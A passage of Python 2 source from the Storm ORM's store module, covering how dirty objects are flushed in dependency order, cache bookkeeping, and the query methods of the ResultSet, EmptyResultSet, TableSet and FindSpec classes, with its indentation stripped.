and if changes are made to the object it will get back to the
dirty list, and be flushed again.
Note that Storm will flush objects for you automatically, so you'll
only need to call this method explicitly in very rare cases where
normal flushing times are insufficient, such as when you want to
make sure a database trigger gets run at a particular time.
"""
self._event.emit("flush")
# The _dirty list may change under us while we're running
# the flush hooks, so we cannot just simply loop over it
# once. To prevent infinite looping we keep track of which
# objects we've called the hook for using a `flushing` dict.
flushing = {}
while self._dirty:
(obj_info, obj) = self._dirty.popitem()
if obj_info not in flushing:
flushing[obj_info] = obj
self._run_hook(obj_info, "__storm_pre_flush__")
self._dirty = flushing
predecessors = {}
for (before_info, after_info), n in self._order.iteritems():
if n > 0:
before_set = predecessors.get(after_info)
if before_set is None:
predecessors[after_info] = set((before_info,))
else:
before_set.add(before_info)
key_func = itemgetter("sequence")
# The external loop is important because items can get into the dirty
# state while we're flushing objects, ...
while self._dirty:
# ... but we don't have to resort everytime an object is flushed,
# so we have an internal loop too. If no objects become dirty
# during flush, this will clean self._dirty and the external loop
# will exit too.
sorted_dirty = sorted(self._dirty, key=key_func)
while sorted_dirty:
for i, obj_info in enumerate(sorted_dirty):
for before_info in predecessors.get(obj_info, ()):
if before_info in self._dirty:
break # A predecessor is still dirty.
else:
break # Found an item without dirty predecessors.
else:
raise OrderLoopError("Can't flush due to ordering loop")
del sorted_dirty[i]
self._dirty.pop(obj_info, None)
self._flush_one(obj_info)
self._order.clear()
# That's not stricly necessary, but prevents getting into bigints.
self._sequence = 0
def _flush_one(self, obj_info):
cls_info = obj_info.cls_info
pending = obj_info.pop("pending", None)
if pending is PENDING_REMOVE:
expr = Delete(compare_columns(cls_info.primary_key,
obj_info["primary_vars"]),
cls_info.table)
self._connection.execute(expr, noresult=True)
# We're sure the cache is valid at this point.
obj_info.pop("invalidated", None)
self._disable_change_notification(obj_info)
self._remove_from_alive(obj_info)
del obj_info["store"]
elif pending is PENDING_ADD:
# Give a chance to the backend to process primary variables.
self._connection.preset_primary_key(cls_info.primary_key,
obj_info.primary_vars)
changes = self._get_changes_map(obj_info, True)
expr = Insert(changes, cls_info.table,
primary_columns=cls_info.primary_key,
primary_variables=obj_info.primary_vars)
result = self._connection.execute(expr)
# We're sure the cache is valid at this point. We just added
# the object.
obj_info.pop("invalidated", None)
self._fill_missing_values(obj_info, obj_info.primary_vars, result)
self._enable_change_notification(obj_info)
self._add_to_alive(obj_info)
else:
cached_primary_vars = obj_info["primary_vars"]
changes = self._get_changes_map(obj_info)
if changes:
expr = Update(changes,
compare_columns(cls_info.primary_key,
cached_primary_vars),
cls_info.table)
self._connection.execute(expr, noresult=True)
self._fill_missing_values(obj_info, obj_info.primary_vars)
self._add_to_alive(obj_info)
self._run_hook(obj_info, "__storm_flushed__")
obj_info.event.emit("flushed")
def block_implicit_flushes(self):
"""Block implicit flushes from operations like execute()."""
self._implicit_flush_block_count += 1
def unblock_implicit_flushes(self):
"""Unblock implicit flushes from operations like execute()."""
assert self._implicit_flush_block_count > 0
self._implicit_flush_block_count -= 1
def block_access(self):
"""Block access to the underlying database connection."""
self._connection.block_access()
def unblock_access(self):
"""Unblock access to the underlying database connection."""
self._connection.unblock_access()
def _get_changes_map(self, obj_info, adding=False):
"""Return a {column: variable} dictionary suitable for inserts/updates.
@param obj_info: ObjectInfo to inspect for changes.
@param adding: If true, any defined variables will be considered
a change and included in the returned map.
"""
cls_info = obj_info.cls_info
changes = {}
select_variables = []
for column in cls_info.columns:
variable = obj_info.variables[column]
if adding or variable.has_changed():
if variable.is_defined():
changes[column] = variable
else:
lazy_value = variable.get_lazy()
if isinstance(lazy_value, Expr):
if id(column) in cls_info.primary_key_idx:
select_variables.append(variable) # See below.
changes[column] = variable
else:
changes[column] = lazy_value
# If we have any expressions in the primary variables, we
# have to resolve them now so that we have the identity of
# the inserted object available later.
if select_variables:
resolve_expr = Select([variable.get_lazy()
for variable in select_variables])
result = self._connection.execute(resolve_expr)
for variable, value in zip(select_variables, result.get_one()):
result.set_variable(variable, value)
return changes
def _fill_missing_values(self, obj_info, primary_vars, result=None):
"""Fill missing values in variables of the given obj_info.
This method will verify which values are unset in obj_info,
and set them to AutoReload, or if it's part of the primary
key, query the database for the actual values.
@param obj_info: ObjectInfo to have its values filled.
@param primary_vars: Variables composing the primary key with
up-to-date values (cached variables may be out-of-date when
this method is called).
@param result: If some value in the set of primary variables
isn't defined, it must be retrieved from the database
using database-dependent logic, which is provided by the
backend in the result of the query which inserted the object.
"""
cls_info = obj_info.cls_info
cached_primary_vars = obj_info.get("primary_vars")
primary_key_idx = cls_info.primary_key_idx
missing_columns = []
for column in cls_info.columns:
variable = obj_info.variables[column]
if not variable.is_defined():
idx = primary_key_idx.get(id(column))
if idx is not None:
if (cached_primary_vars is not None
and variable.get_lazy() is AutoReload):
# For auto-reloading a primary key, just
# get the value out of the cache.
variable.set(cached_primary_vars[idx].get())
else:
missing_columns.append(column)
else:
# Any lazy values are overwritten here. This value
# must have just been sent to the database, so this
# was already set there.
variable.set(AutoReload)
else:
variable.checkpoint()
if missing_columns:
where = result.get_insert_identity(cls_info.primary_key,
primary_vars)
result = self._connection.execute(Select(missing_columns, where))
self._set_values(obj_info, missing_columns,
result, result.get_one())
def _validate_alive(self, obj_info):
"""Perform cache validation for the given obj_info."""
where = compare_columns(obj_info.cls_info.primary_key,
obj_info["primary_vars"])
result = self._connection.execute(Select(SQLRaw("1"), where))
if not result.get_one():
raise LostObjectError("Object is not in the database anymore")
obj_info.pop("invalidated", None)
def _load_object(self, cls_info, result, values):
# _set_values() need the cls_info columns for the class of the
# actual object, not from a possible wrapper (e.g. an alias).
cls = cls_info.cls
cls_info = get_cls_info(cls)
# Prepare cache key.
primary_vars = []
columns = cls_info.columns
for value in values:
if value is not None:
break
else:
# We've got a row full of NULLs, so consider that the object
# wasn't found. This is useful for joins, where non-existent
# rows are represented like that.
return None
for i in cls_info.primary_key_pos:
value = values[i]
variable = columns[i].variable_factory(value=value, from_db=True)
primary_vars.append(variable)
# Lookup cache.
primary_values = tuple(var.get(to_db=True) for var in primary_vars)
obj_info = self._alive.get((cls, primary_values))
if obj_info is not None:
# Found object in cache, and it must be valid since the
# primary key was extracted from result values.
obj_info.pop("invalidated", None)
# Take that chance and fill up any undefined variables
# with fresh data, since we got it anyway.
self._set_values(obj_info, cls_info.columns, result,
values, keep_defined=True)
# We're not sure if the obj is still in memory at this
# point. This will rebuild it if needed.
obj = self._get_object(obj_info)
else:
# Nothing found in the cache. Build everything from the ground.
obj = cls.__new__(cls)
obj_info = get_obj_info(obj)
obj_info["store"] = self
self._set_values(obj_info, cls_info.columns, result, values,
replace_unknown_lazy=True)
self._add_to_alive(obj_info)
self._enable_change_notification(obj_info)
self._enable_lazy_resolving(obj_info)
self._run_hook(obj_info, "__storm_loaded__")
return obj
def _get_object(self, obj_info):
"""Return object for obj_info, rebuilding it if it's dead."""
obj = obj_info.get_obj()
if obj is None:
cls = obj_info.cls_info.cls
obj = cls.__new__(cls)
obj_info.set_obj(obj)
set_obj_info(obj, obj_info)
# Re-enable change notification, as it may have been implicitely
# disabled when the previous object has been collected
self._enable_change_notification(obj_info)
self._run_hook(obj_info, "__storm_loaded__")
# Renew the cache.
self._cache.add(obj_info)
return obj
@staticmethod
def _run_hook(obj_info, hook_name):
func = getattr(obj_info.get_obj(), hook_name, None)
if func is not None:
func()
def _set_values(self, obj_info, columns, result, values,
keep_defined=False, replace_unknown_lazy=False):
if values is None:
raise LostObjectError("Can't obtain values from the database "
"(object got removed?)")
obj_info.pop("invalidated", None)
for column, value in zip(columns, values):
variable = obj_info.variables[column]
lazy_value = variable.get_lazy()
is_unknown_lazy = not (lazy_value is None or
lazy_value is AutoReload)
if keep_defined:
if variable.is_defined() or is_unknown_lazy:
continue
elif is_unknown_lazy and not replace_unknown_lazy:
# This should *never* happen, because whenever we get
# to this point it should be after a flush() which
# updated the database with lazy values and then replaced
# them by AutoReload. Letting this go through means
# we're blindly discarding an unknown lazy value and
# replacing it by the value from the database.
raise RuntimeError("Unexpected situation. "
"Please contact the developers.")
if value is None:
variable.set(value, from_db=True)
else:
result.set_variable(variable, value)
variable.checkpoint()
def _is_dirty(self, obj_info):
return obj_info in self._dirty
def _set_dirty(self, obj_info):
if obj_info not in self._dirty:
self._dirty[obj_info] = obj_info.get_obj()
obj_info["sequence"] = self._sequence = self._sequence + 1
def _set_clean(self, obj_info):
self._dirty.pop(obj_info, None)
def _iter_dirty(self):
return self._dirty
def _add_to_alive(self, obj_info):
"""Add an object to the set of known in-memory objects.
When an object is added to the set of known in-memory objects,
the key is built from a copy of the current variables that are
part of the primary key. This means that, when an object is
retrieved from the database, these values may be used to get
the cached object which is already in memory, even if it
requested the primary key value to be changed. For that reason,
when changes to the primary key are flushed, the alive object
key should also be updated to reflect these changes.
In addition to tracking objects alive in memory, we have a strong
reference cache which keeps a fixed number of last-used objects
in-memory, to prevent further database access for recently fetched
objects.
"""
cls_info = obj_info.cls_info
old_primary_vars = obj_info.get("primary_vars")
if old_primary_vars is not None:
old_primary_values = tuple(
var.get(to_db=True) for var in old_primary_vars)
self._alive.pop((cls_info.cls, old_primary_values), None)
new_primary_vars = tuple(variable.copy()
for variable in obj_info.primary_vars)
new_primary_values = tuple(
var.get(to_db=True) for var in new_primary_vars)
self._alive[cls_info.cls, new_primary_values] = obj_info
obj_info["primary_vars"] = new_primary_vars
self._cache.add(obj_info)
def _remove_from_alive(self, obj_info):
"""Remove an object from the cache.
This method is only called for objects that were explicitly
deleted and flushed. Objects that are unused will get removed
from the cache dictionary automatically by their weakref callbacks.
"""
primary_vars = obj_info.get("primary_vars")
if primary_vars is not None:
self._cache.remove(obj_info)
primary_values = tuple(var.get(to_db=True) for var in primary_vars)
del self._alive[obj_info.cls_info.cls, primary_values]
del obj_info["primary_vars"]
def _iter_alive(self):
return self._alive.values()
def _enable_change_notification(self, obj_info):
obj_info.event.emit("start-tracking-changes", self._event)
obj_info.event.hook("changed", self._variable_changed)
def _disable_change_notification(self, obj_info):
obj_info.event.unhook("changed", self._variable_changed)
obj_info.event.emit("stop-tracking-changes", self._event)
def _variable_changed(self, obj_info, variable,
old_value, new_value, fromdb):
# The fromdb check makes sure that values coming from the
# database don't mark the object as dirty again.
# XXX The fromdb check is untested. How to test it?
if not fromdb:
if new_value is not Undef and new_value is not AutoReload:
if obj_info.get("invalidated"):
# This might be a previously alive object being
# updated. Let's validate it now to improve debugging.
# This will raise LostObjectError if the object is gone.
self._validate_alive(obj_info)
self._set_dirty(obj_info)
def _enable_lazy_resolving(self, obj_info):
obj_info.event.hook("resolve-lazy-value", self._resolve_lazy_value)
def _disable_lazy_resolving(self, obj_info):
obj_info.event.unhook("resolve-lazy-value", self._resolve_lazy_value)
def _resolve_lazy_value(self, obj_info, variable, lazy_value):
"""Resolve a variable set to a lazy value when it's touched.
This method is hooked into the obj_info to resolve variables
set to lazy values when they're accessed. It will first flush
the store, and then set all variables set to AutoReload to
their database values.
"""
if lazy_value is not AutoReload and not isinstance(lazy_value, Expr):
# It's not something we handle.
return
# XXX This will do it for now, but it should really flush
# just this single object and ones that it depends on.
# _flush_one() doesn't consider dependencies, so it may
# not be used directly. Maybe allow flush(obj)?
if self._implicit_flush_block_count == 0:
self.flush()
autoreload_columns = []
for column in obj_info.cls_info.columns:
if obj_info.variables[column].get_lazy() is AutoReload:
autoreload_columns.append(column)
if autoreload_columns:
where = compare_columns(obj_info.cls_info.primary_key,
obj_info["primary_vars"])
result = self._connection.execute(
Select(autoreload_columns, where))
self._set_values(obj_info, autoreload_columns,
result, result.get_one())
class ResultSet(object):
"""The representation of the results of a query.
Note that having an instance of this class does not indicate that
a database query has necessarily been made. Database queries are
put off until absolutely necessary.
Generally these should not be constructed directly, but instead
retrieved from calls to L{Store.find}.
"""
def __init__(self, store, find_spec,
where=Undef, tables=Undef, select=Undef):
self._store = store
self._find_spec = find_spec
self._where = where
self._tables = tables
self._select = select
self._order_by = find_spec.default_order
self._offset = Undef
self._limit = Undef
self._distinct = False
self._group_by = Undef
self._having = Undef
def copy(self):
"""Return a copy of this ResultSet object, with the same configuration.
"""
result_set = object.__new__(self.__class__)
result_set.__dict__.update(self.__dict__)
if self._select is not Undef:
# This expression must be copied because we may have to change it
# in-place inside _get_select().
result_set._select = copy(self._select)
return result_set
def config(self, distinct=None, offset=None, limit=None):
"""Configure this result object in-place. All parameters are optional.
@param distinct: If True, enables usage of the DISTINCT keyword in
the query. If a tuple or list of columns, inserts a DISTINCT ON
(only supported by PostgreSQL).
@param offset: Offset where results will start to be retrieved
from the result set.
@param limit: Limit the number of objects retrieved from the
result set.
@return: self (not a copy).
"""
if distinct is not None:
self._distinct = distinct
if offset is not None:
self._offset = offset
if limit is not None:
self._limit = limit
return self
def _get_select(self):
if self._select is not Undef:
if self._order_by is not Undef:
self._select.order_by = self._order_by
if self._limit is not Undef: # XXX UNTESTED!
self._select.limit = self._limit
if self._offset is not Undef: # XXX UNTESTED!
self._select.offset = self._offset
return self._select
columns, default_tables = self._find_spec.get_columns_and_tables()
return Select(columns, self._where, self._tables, default_tables,
self._order_by, offset=self._offset, limit=self._limit,
distinct=self._distinct, group_by=self._group_by,
having=self._having)
def _load_objects(self, result, values):
return self._find_spec.load_objects(self._store, result, values)
def __iter__(self):
"""Iterate the results of the query.
"""
result = self._store._connection.execute(self._get_select())
for values in result:
yield self._load_objects(result, values)
def __getitem__(self, index):
"""Get an individual item by offset, or a range of items by slice.
@return: The matching object or, if a slice is used, a new
L{ResultSet} will be returned appropriately modified with
C{OFFSET} and C{LIMIT} clauses.
"""
if isinstance(index, (int, long)):
if index == 0:
result_set = self
else:
if self._offset is not Undef:
index += self._offset
result_set = self.copy()
result_set.config(offset=index, limit=1)
obj = result_set._any()
if obj is None:
raise IndexError("Index out of range")
return obj
if not isinstance(index, slice):
raise IndexError("Can't index ResultSets with %r" % (index,))
if index.step is not None:
raise IndexError("Stepped slices not yet supported: %r"
% (index.step,))
offset = self._offset
limit = self._limit
if index.start is not None:
if offset is Undef:
offset = index.start
else:
offset += index.start
if limit is not Undef:
limit = max(0, limit - index.start)
if index.stop is not None:
if index.start is None:
new_limit = index.stop
else:
new_limit = index.stop - index.start
if limit is Undef or limit > new_limit:
limit = new_limit
return self.copy().config(offset=offset, limit=limit)
def __contains__(self, item):
"""Check if an item is contained within the result set."""
columns, values = self._find_spec.get_columns_and_values_for_item(item)
if self._select is Undef and self._group_by is Undef:
# No predefined select: adjust the where clause.
dummy, default_tables = self._find_spec.get_columns_and_tables()
where = [Eq(*pair) for pair in zip(columns, values)]
if self._where is not Undef:
where.append(self._where)
select = Select(1, And(*where), self._tables,
default_tables)
else:
# Rewrite the predefined query and use it as a subquery.
aliased_columns = [Alias(column, "_key%d" % index)
for (index, column) in enumerate(columns)]
subquery = replace_columns(self._get_select(), aliased_columns)
where = [Eq(*pair) for pair in zip(aliased_columns, values)]
select = Select(1, And(*where), Alias(subquery, "_tmp"))
result = self._store._connection.execute(select)
return result.get_one() is not None
def is_empty(self):
"""Return C{True} if this result set doesn't contain any results."""
subselect = self._get_select()
subselect.limit = 1
subselect.order_by = Undef
select = Select(1, tables=Alias(subselect, "_tmp"), limit=1)
result = self._store._connection.execute(select)
return (not result.get_one())
def any(self):
"""Return a single item from the result set.
@return: An arbitrary object or C{None} if one isn't available.
@seealso: one(), first(), and last().
"""
select = self._get_select()
select.limit = 1
select.order_by = Undef
result = self._store._connection.execute(select)
values = result.get_one()
if values:
return self._load_objects(result, values)
return None
def _any(self):
"""Return a single item from the result without changing sort order.
@return: An arbitrary object or C{None} if one isn't available.
"""
select = self._get_select()
select.limit = 1
result = self._store._connection.execute(select)
values = result.get_one()
if values:
return self._load_objects(result, values)
return None
def first(self):
"""Return the first item from an ordered result set.
@raises UnorderedError: Raised if the result set isn't ordered.
@return: The first object or C{None} if one isn't available.
@seealso: last(), one(), and any().
"""
if self._order_by is Undef:
raise UnorderedError("Can't use first() on unordered result set")
return self._any()
def last(self):
"""Return the last item from an ordered result set.
@raises FeatureError: Raised if the result set has a C{LIMIT} set.
@raises UnorderedError: Raised if the result set isn't ordered.
@return: The last object or C{None} if one isn't available.
@seealso: first(), one(), and any().
"""
if self._order_by is Undef:
raise UnorderedError("Can't use last() on unordered result set")
if self._limit is not Undef:
raise FeatureError("Can't use last() with a slice "
"of defined stop index")
select = self._get_select()
select.offset = Undef
select.limit = 1
select.order_by = []
for expr in self._order_by:
if isinstance(expr, Desc):
select.order_by.append(expr.expr)
elif isinstance(expr, Asc):
select.order_by.append(Desc(expr.expr))
else:
select.order_by.append(Desc(expr))
result = self._store._connection.execute(select)
values = result.get_one()
if values:
return self._load_objects(result, values)
return None
def one(self):
"""Return one item from a result set containing at most one item.
@raises NotOneError: Raised if the result set contains more than one
item.
@return: The object or C{None} if one isn't available.
@seealso: first(), one(), and any().
"""
select = self._get_select()
# limit could be 1 due to slicing, for instance.
if select.limit is not Undef and select.limit > 2:
select.limit = 2
result = self._store._connection.execute(select)
values = result.get_one()
if result.get_one():
raise NotOneError("one() used with more than one result available")
if values:
return self._load_objects(result, values)
return None
def order_by(self, *args):
"""Specify the ordering of the results.
The query will be modified appropriately with an ORDER BY clause.
Ascending and descending order can be specified by wrapping
the columns in L{Asc} and L{Desc}.
@param args: One or more L{storm.expr.Column} objects.
"""
if self._offset is not Undef or self._limit is not Undef:
raise FeatureError("Can't reorder a sliced result set")
self._order_by = args or Undef
return self
def remove(self):
"""Remove all rows represented by this ResultSet from the database.
This is done efficiently with a DELETE statement, so objects
are not actually loaded into Python.
"""
if self._group_by is not Undef:
raise FeatureError("Removing isn't supported after a "
" GROUP BY clause ")
if self._offset is not Undef or self._limit is not Undef:
raise FeatureError("Can't remove a sliced result set")
if self._find_spec.default_cls_info is None:
raise FeatureError("Removing not yet supported for tuple or "
"expression finds")
if self._select is not Undef:
raise FeatureError("Removing isn't supported with "
"set expressions (unions, etc)")
result = self._store._connection.execute(
Delete(self._where, self._find_spec.default_cls_info.table))
return result.rowcount
def group_by(self, *expr):
"""Group this ResultSet by the given expressions.
@param expr: The expressions used in the GROUP BY statement.
@return: self (not a copy).
"""
if self._select is not Undef:
raise FeatureError("Grouping isn't supported with "
"set expressions (unions, etc)")
find_spec = FindSpec(expr)
columns, dummy = find_spec.get_columns_and_tables()
self._group_by = columns
return self
def having(self, *expr):
"""Filter result previously grouped by.
@param expr: Instances of L{Expr}.
@return: self (not a copy).
"""
if self._group_by is Undef:
raise FeatureError("having can only be called after group_by.")
self._having = And(*expr)
return self
def _aggregate(self, aggregate_func, expr, column=None):
if self._group_by is not Undef:
raise FeatureError("Single aggregates aren't supported after a "
" GROUP BY clause ")
columns, default_tables = self._find_spec.get_columns_and_tables()
if (self._select is Undef and not self._distinct and
self._offset is Undef and self._limit is Undef):
select = Select(aggregate_func(expr), self._where,
self._tables, default_tables)
else:
if expr is Undef:
aggregate = aggregate_func(expr)
else:
alias = Alias(expr, "_expr")
columns.append(alias)
aggregate = aggregate_func(alias)
subquery = replace_columns(self._get_select(), columns)
select = Select(aggregate, tables=Alias(subquery, "_tmp"))
result = self._store._connection.execute(select)
value = result.get_one()[0]
variable_factory = getattr(column, "variable_factory", None)
if variable_factory:
variable = variable_factory(allow_none=True)
result.set_variable(variable, value)
return variable.get()
return value
def count(self, expr=Undef, distinct=False):
"""Get the number of objects represented by this ResultSet."""
return int(self._aggregate(lambda expr: Count(expr, distinct), expr))
def max(self, expr):
"""Get the highest value from an expression."""
return self._aggregate(Max, expr, expr)
def min(self, expr):
"""Get the lowest value from an expression."""
return self._aggregate(Min, expr, expr)
def avg(self, expr):
"""Get the average value from an expression."""
value = self._aggregate(Avg, expr)
if value is None:
return value
return float(value)
def sum(self, expr):
"""Get the sum of all values in an expression."""
return self._aggregate(Sum, expr, expr)
def get_select_expr(self, *columns):
"""Get a L{Select} expression to retrieve only the specified columns.
@param columns: One or more L{storm.expr.Column} objects whose values
will be fetched.
@raises FeatureError: Raised if no columns are specified or if this
result is a set expression such as a union.
@return: A L{Select} expression configured to use the query parameters
specified for this result set, and also limited to only retrieving
data for the specified columns.
"""
if not columns:
raise FeatureError("select() takes at least one column "
"as argument")
if self._select is not Undef:
raise FeatureError(
"Can't generate subselect expression for set expressions")
select = self._get_select()
select.columns = columns
return select
def values(self, *columns):
"""Retrieve only the specified columns.
This does not load full objects from the database into Python.
@param columns: One or more L{storm.expr.Column} objects whose
values will be fetched.
@raises FeatureError: Raised if no columns are specified or if this
result is a set expression such as a union.
@return: An iterator of tuples of the values for each column
from each matching row in the database.
"""
if not columns:
raise FeatureError("values() takes at least one column "
"as argument")
if self._select is not Undef:
raise FeatureError("values() can't be used with set expressions")
select = self._get_select()
select.columns = columns
result = self._store._connection.execute(select)
if len(columns) == 1:
variable = columns[0].variable_factory()
for values in result:
result.set_variable(variable, values[0])
yield variable.get()
else:
variables = [column.variable_factory() for column in columns]
for values in result:
for variable, value in zip(variables, values):
result.set_variable(variable, value)
yield tuple(variable.get() for variable in variables)
def set(self, *args, **kwargs):
"""Update objects in the result set with the given arguments.
This method will update all objects in the current result set
to match expressions given as equalities or keyword arguments.
These objects may still be in the database (an UPDATE is issued)
or may be cached.
For instance, C{result.set(Class.attr1 == 1, attr2=2)} will set
C{attr1} to 1 and C{attr2} to 2, on all matching objects.
"""
if self._group_by is not Undef:
raise FeatureError("Setting isn't supported after a "
" GROUP BY clause ")
if self._find_spec.default_cls_info is None:
raise FeatureError("Setting isn't supported with tuple or "
"expression finds")
if self._select is not Undef:
raise FeatureError("Setting isn't supported with "
"set expressions (unions, etc)")
if not (args or kwargs):
return
changes = {}
cls = self._find_spec.default_cls_info.cls
# For now only "Class.attr == var" is supported in args.
for expr in args:
if not isinstance(expr, Eq):
raise FeatureError("Unsupported set expression: %r" %
repr(expr))
elif not isinstance(expr.expr1, Column):
raise FeatureError("Unsupported left operand in set "
"expression: %r" % repr(expr.expr1))
elif not isinstance(expr.expr2, (Expr, Variable)):
raise FeatureError("Unsupported right operand in set "
"expression: %r" % repr(expr.expr2))
changes[expr.expr1] = expr.expr2
for key, value in kwargs.items():
column = getattr(cls, key)
if value is None:
changes[column] = None
elif isinstance(value, Expr):
changes[column] = value
else:
changes[column] = column.variable_factory(value=value)
expr = Update(changes, self._where,
self._find_spec.default_cls_info.table)
self._store.execute(expr, noresult=True)
try:
cached = self.cached()
except CompileError:
# We are iterating through all objects in memory here, so
# check if the object type matches to avoid trying to
# invalidate a column that does not exist, on an unrelated
# object.
for obj_info in self._store._iter_alive():
if obj_info.cls_info is self._find_spec.default_cls_info:
for column in changes:
obj_info.variables[column].set(AutoReload)
else:
changes = changes.items()
for obj in cached:
for column, value in changes:
variables = get_obj_info(obj).variables
if value is None:
pass
elif isinstance(value, Variable):
value = value.get()
elif isinstance(value, Expr):
# If the value is an Expression that means we
# can't compute it by ourselves: we rely on
# the database to compute it, so just set the
# value to AutoReload.
value = AutoReload
else:
value = variables[value].get()
variables[column].set(value)
variables[column].checkpoint()
def cached(self):
"""Return matching objects from the cache for the current query."""
if self._find_spec.default_cls_info is None:
raise FeatureError("Cache finds not supported with tuples "
"or expressions")
if self._tables is not Undef:
raise FeatureError("Cache finds not supported with custom tables")
if self._where is Undef:
match = None
else:
match = compile_python.get_matcher(self._where)
def get_column(column):
return obj_info.variables[column].get()
objects = []
for obj_info in self._store._iter_alive():
try:
if (obj_info.cls_info is self._find_spec.default_cls_info and
(match is None or match(get_column))):
objects.append(self._store._get_object(obj_info))
except LostObjectError:
pass # This may happen when resolving lazy values
# in get_column().
return objects
def find(self, *args, **kwargs):
"""Perform a query on objects within this result set.
This is analogous to L{Store.find}, although it doesn't take a
C{cls_spec} argument, instead using the same tables as the
existing result set, and restricts the results to those in
this set.
@param args: Instances of L{Expr}.
@param kwargs: Mapping of simple column names to values or
expressions to query for.
@return: A L{ResultSet} of matching instances.
"""
if self._select is not Undef:
raise FeatureError("Can't query set expressions")
if self._offset is not Undef or self._limit is not Undef:
raise FeatureError("Can't query a sliced result set")
if self._group_by is not Undef:
raise FeatureError("Can't query grouped result sets")
result_set = self.copy()
extra_where = get_where_for_args(
args, kwargs, self._find_spec.default_cls)
if extra_where is not Undef:
if result_set._where is Undef:
result_set._where = extra_where
else:
result_set._where = And(result_set._where, extra_where)
return result_set
def _set_expr(self, expr_cls, other, all=False):
if not self._find_spec.is_compatible(other._find_spec):
raise FeatureError("Incompatible results for set operation")
expr = expr_cls(self._get_select(), other._get_select(), all=all)
return ResultSet(self._store, self._find_spec, select=expr)
def union(self, other, all=False):
"""Get the L{Union} of this result set and another.
@param all: If True, include duplicates.
"""
if isinstance(other, EmptyResultSet):
return self
return self._set_expr(Union, other, all)
def difference(self, other, all=False):
"""Get the difference, using L{Except}, of this result set and another.
@param all: If True, include duplicates.
"""
if isinstance(other, EmptyResultSet):
return self
return self._set_expr(Except, other, all)
def intersection(self, other, all=False):
"""Get the L{Intersection} of this result set and another.
@param all: If True, include duplicates.
"""
if isinstance(other, EmptyResultSet):
return other
return self._set_expr(Intersect, other, all)
class EmptyResultSet(object):
"""An object that looks like a L{ResultSet} but represents no rows.
This is convenient for application developers who want to provide
a method which is guaranteed to return a L{ResultSet}-like object
but which, in certain cases, knows there is no point in querying
the database. For example::
def get_people(self, ids):
if not ids:
return EmptyResultSet()
return store.find(People, People.id.is_in(ids))
The methods on EmptyResultSet (L{one}, L{config}, L{union}, etc)
are meant to emulate a L{ResultSet} which has matched no rows.
"""
def __init__(self, ordered=False):
self._order_by = ordered
def copy(self):
result = EmptyResultSet(self._order_by)
return result
def config(self, distinct=None, offset=None, limit=None):
pass
def __iter__(self):
return
yield None
def __getitem__(self, index):
return self.copy()
def __contains__(self, item):
return False
def is_empty(self):
return True
def any(self):
return None
def first(self):
if self._order_by:
return None
raise UnorderedError("Can't use first() on unordered result set")
def last(self):
if self._order_by:
return None
raise UnorderedError("Can't use last() on unordered result set")
def one(self):
return None
def order_by(self, *args):
self._order_by = True
return self
def remove(self):
return 0
def count(self, expr=Undef, distinct=False):
return 0
def max(self, column):
return None
def min(self, column):
return None
def avg(self, column):
return None
def sum(self, column):
return None
def get_select_expr(self, *columns):
"""Get a L{Select} expression to retrieve only the specified columns.
@param columns: One or more L{storm.expr.Column} objects whose values
will be fetched.
@raises FeatureError: Raised if no columns are specified.
@return: A L{Select} expression configured to use the query parameters
specified for this result set. The result of the select will
always be an empty set of rows.
"""
if not columns:
raise FeatureError("select() takes at least one column "
"as argument")
return Select(columns, False)
def values(self, *columns):
if not columns:
raise FeatureError("values() takes at least one column "
"as argument")
return
yield None
def set(self, *args, **kwargs):
pass
def cached(self):
return []
def find(self, *args, **kwargs):
return self
def union(self, other):
if isinstance(other, EmptyResultSet):
return self
return other.union(self)
def difference(self, other):
return self
def intersection(self, other):
return self
class TableSet(object):
"""The representation of a set of tables which can be queried at once.
This will typically be constructed by a call to L{Store.using}.
"""
def __init__(self, store, tables):
self._store = store
self._tables = tables
def find(self, cls_spec, *args, **kwargs):
"""Perform a query on the previously specified tables.
This is identical to L{Store.find} except that the tables are
explicitly specified instead of relying on inference.
@return: A L{ResultSet}.
"""
if self._store._implicit_flush_block_count == 0:
self._store.flush()
find_spec = FindSpec(cls_spec)
where = get_where_for_args(args, kwargs, find_spec.default_cls)
return self._store._result_set_factory(self._store, find_spec,
where, self._tables)
Store._result_set_factory = ResultSet
Store._table_set = TableSet
class FindSpec(object):
"""The set of tables or expressions in the result of L{Store.find}."""
def __init__(self, cls_spec):
self.is_tuple = type(cls_spec) == tuple
if not self.is_tuple:
cls_spec = (cls_spec,)
info = []
for item in cls_spec:
if isinstance(item, Expr):
info.append((True, item))
else:
info.append((False, get_cls_info(item)))
self._cls_spec_info = tuple(info)
# Do we have a single non-expression item here?
if not self.is_tuple and not info[0][0]:
self.default_cls = cls_spec[0]
self.default_cls_info = info[0][1]
self.default_order = self.default_cls_info.default_order
else:
self.default_cls = None
self.default_cls_info = None
self.default_order = Undef
def get_columns_and_tables(self):
columns = []
default_tables = []
for is_expr, info in self._cls_spec_info:
if is_expr:
columns.append(info)
if isinstance(info, Column):
default_tables.append(info.table)
else:
columns.extend(info.columns)
default_tables.append(info.table)
return columns, default_tables
def is_compatible(self, find_spec):
"""Return True if this FindSpec is compatible with a second one."""
if self.is_tuple != find_spec.is_tuple:
return False
if len(self._cls_spec_info) != len(find_spec._cls_spec_info):
return False
for (is_expr1, info1), (is_expr2, info2) in zip(
self._cls_spec_info, find_spec._cls_spec_info):
if is_expr1 != is_expr2:
return False
if info1 is not info2:
return False
return True
def load_objects(self, store, result, values):
objects = []
values_start = values_end = 0
for is_expr, info in self._cls_spec_info:
if is_expr:
values_end += 1
variable = getattr(info, "variable_factory", Variable)(
value=values[values_start], from_db=True)
objects.append(variable.get())
else:
values_end += len(info.columns)
obj = store._load_object(info, result,
values[values_start:values_end])
objects.append(obj)
values_start = values_end
if self.is_tuple:
return tuple(objects)
else:
return objects[0]
def get_columns_and_values_for_item(self, item):
"""Generate a comparison expression with the given item."""
if isinstance(item, tuple):
if not self.is_tuple:
raise TypeError("Find spec does not expect tuples.")
else:
if self.is_tuple:
raise TypeError("Find spec expects tuples.")
item = (item,)
columns = []
values = []
for (is_expr, info), value in zip(self._cls_spec_info, item):
if is_expr:
if not isinstance(value, (Expr, Variable)) and (
value is not None):
value = getattr(info, "variable_factory", Variable)(
value=value)
columns.append(info)
values.append(value)
else:
obj_info = get_obj_info(value)
if obj_info.cls_info != info:
raise TypeError("%r does not match %r" % (value, info))
columns.extend(info.primary_key)
values.extend(obj_info.primary_vars)
return columns, values
def get_where_for_args(args, kwargs, cls=None):
equals = list(args)
if kwargs:
if cls is None:
raise FeatureError("Can't determine class that keyword "
